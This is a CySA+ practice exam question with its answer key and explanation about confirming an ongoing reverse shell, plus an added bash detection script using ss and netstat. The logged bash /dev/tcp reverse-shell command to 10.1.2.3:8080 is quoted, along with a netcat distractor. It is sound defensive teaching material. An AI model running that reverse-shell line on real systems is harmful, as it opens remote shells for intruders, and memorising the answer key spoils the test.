CompTIA CySA+ (CS0-003) — Question 40
A security analyst identified the following suspicious entry in the host-based IDS logs:
bash -i >& /dev/tcp/10.1.2.3/8080 0>&1
Which of the following shell scripts should the analyst use to most accurately confirm if the activity is ongoing?
Answer options
- A. #!/bin/bash nc 10.1.2.3 8080 -vv >/dev/null && echo "Malicious activity" || echo "OK"
- B. #!/bin/bash ps -fea | grep 8080 >/dev/null && echo "Malicious activity" || echo "OK"
- C. #!/bin/bash ls /opt/tcp/10.1.2.3/8080 >/dev/null && echo "Malicious activity" || echo "OK"
- D. #!/bin/bash netstat -antp | grep 8080 >/dev/null && echo "Malicious activity" || echo "OK"
Correct answer: D
Explanation
The correct answer is D. The logged command is a bash reverse shell: it opens an outbound TCP connection to 10.1.2.3 on port 8080 through bash's /dev/tcp pseudo-device and redirects the interactive shell's stdin, stdout and stderr to that socket. For as long as the attacker holds the session, the host has an ESTABLISHED TCP socket whose foreign address is 10.1.2.3:8080, and netstat -antp (all sockets, numeric addresses, TCP only, owning PID/program) lists it with bash as the owning process. The connection is outbound, not listening, so the indicator is the foreign-address column, not a LISTEN entry. Practical caveats: -p only shows PIDs for other users' sockets when run as root; a bare grep 8080 also matches a legitimate service on port 8080, port 18080, and TIME_WAIT leftovers, so filter on the full 10.1.2.3:8080 and the ESTABLISHED state; on hosts without net-tools, ss -antp gives the same view; and because reverse shells are often relaunched from cron or a loop, a single clean snapshot shows only that nothing is connected right now.

Option A is wrong and actively harmful: nc 10.1.2.3 8080 opens a new connection from the victim to the attacker's listener, which tips off the attacker and reports "Malicious activity" whenever that listener is up, regardless of whether this host has a shell connected. Option B is unreliable: the redirections are processed by the shell before the command runs and are not part of the process's arguments, so ps shows only bash -i and 8080 never appears unless the attacker happened to launch it via bash -c "...". Option C is meaningless: /dev/tcp is a bash built-in pseudo-path that only exists while a redirection targets it, not a directory you can list, and /opt/tcp does not exist at all.
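The script below is a sharper version of option D, added here as a worked example; it is not part of the exam page. It assumes a Linux host with either ss or netstat installed. Instead of grepping for the bare string 8080, it matches the peer-address field exactly and requires the ESTABLISHED state, which removes the false positives from a local service on 8080, port 18080, or a TIME_WAIT socket. The two socket tables embedded in the script are constructed sample output for offline use; the function names find_reverse_shell, socket_table and verdict are this example's own.

```bash
#!/bin/bash
# Added example, not from the exam page: confirm whether a reverse shell to
# 10.1.2.3:8080 (the IDS entry above) is connected right now.
# Assumption: Linux host with `ss` (iproute2) or legacy `netstat` (net-tools).

ATTACKER_IP="10.1.2.3"
ATTACKER_PORT="8080"

# find_reverse_shell reads socket-table lines on stdin in either the
# `netstat -antp` or the `ss -antp` layout. In both layouts the peer
# (foreign) address is field 5, so comparing that field exactly and
# requiring an ESTABLISHED/ESTAB state avoids the false positives of a
# bare `grep 8080`. Prints matching lines; exit status 0 if any matched.
find_reverse_shell() {
    awk -v peer="${ATTACKER_IP}:${ATTACKER_PORT}" \
        '$5 == peer && $0 ~ /ESTAB/ { found = 1; print } END { exit !found }'
}

# socket_table dumps the live socket table, preferring ss. Note that -p
# only shows PIDs/programs for other users' sockets when run as root.
socket_table() {
    if command -v ss >/dev/null 2>&1; then
        ss -antp
    else
        netstat -antp
    fi
}

# verdict reads a socket table on stdin and prints the same strings the
# exam options print, after echoing the offending socket line(s).
verdict() {
    if find_reverse_shell; then
        echo "Malicious activity"
    else
        echo "OK"
    fi
}

# Constructed sample output in netstat layout. The LISTEN line is a benign
# local service on 8080 that a bare `grep 8080` would flag; the bash line
# is what the reverse shell from the IDS entry looks like once connected.
SAMPLE_NETSTAT='Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:8080            0.0.0.0:*               LISTEN      612/java
tcp        0      0 192.168.1.10:51234      10.1.2.3:8080           ESTABLISHED 4421/bash
tcp        0      0 192.168.1.10:51240      93.184.216.34:443       TIME_WAIT   -'

# The same host as seen by `ss -antp` (constructed).
SAMPLE_SS='State  Recv-Q Send-Q Local Address:Port   Peer Address:Port  Process
LISTEN 0      128    0.0.0.0:8080        0.0.0.0:*          users:(("java",pid=612,fd=5))
ESTAB  0      0      192.168.1.10:51234  10.1.2.3:8080      users:(("bash",pid=4421,fd=2))'

# `--live` checks the running host; with no argument, run against the sample.
if [ "${1:-}" = "--live" ]; then
    socket_table | verdict
else
    printf '%s\n' "$SAMPLE_NETSTAT" | verdict
fi
```

Run it with --live on the suspect host (as root, so the PID/program column is populated). If it reports "Malicious activity", the printed line gives the PID of the bash process; ls -l /proc/PID/fd will show fds 0, 1 and 2 pointing at the same socket, which is the definitive confirmation before you kill the process and look for whatever relaunches it.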